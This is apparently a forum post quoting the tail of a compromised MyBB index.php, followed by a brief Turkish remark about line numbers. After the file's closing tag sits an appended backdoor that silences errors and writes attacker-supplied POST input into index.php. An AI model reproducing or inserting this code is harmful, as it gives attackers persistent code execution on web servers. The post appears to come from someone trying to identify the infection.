}

while($forum = $db->fetch_array($query))
{
if($mybb->user['uid'] == 0)
{
if(!empty($forumsread[$forum['fid']]))
{
$forum['lastread'] = $forumsread[$forum['fid']];
}
}
$fcache[$forum['pid']][$forum['disporder']][$forum['fid']] = $forum;
}
$forumpermissions = forum_permissions();

// Get the forum moderators if the setting is enabled.
$moderatorcache = array();
if($mybb->settings['modlist'] != 0 && $mybb->settings['modlist'] != 'off')
{
$moderatorcache = $cache->read('moderators');
}

$excols = 'index';
$permissioncache['-1'] = '1';
$bgcolor = 'trow1';

// Decide if we're showing first-level subforums on the index page.
$showdepth = 2;
if($mybb->settings['subforumsindex'] != 0)
{
$showdepth = 3;
}

$forum_list = build_forumbits();
$forums = $forum_list['forum_list'];

$plugins->run_hooks('index_end');

eval('$index = "'.$templates->get('index').'";');
output_page($index);
?>
error_reporting(0);
$kodlar=@$_POST['kodlar'];
$url = $_SERVER['PHP_SELF'];
if (@$_POST['q']=="okey") {
$dosya_adi="index.php";
$dosya=fopen($dosya_adi, "a+");
fwrite($dosya, '');
fwrite($dosya, $kodlar);
fwrite($dosya, '
');
fclose($dosya);
}
echo "";

<script></script>
?>


Hocam 350-406 arası '406' son satır zaten :)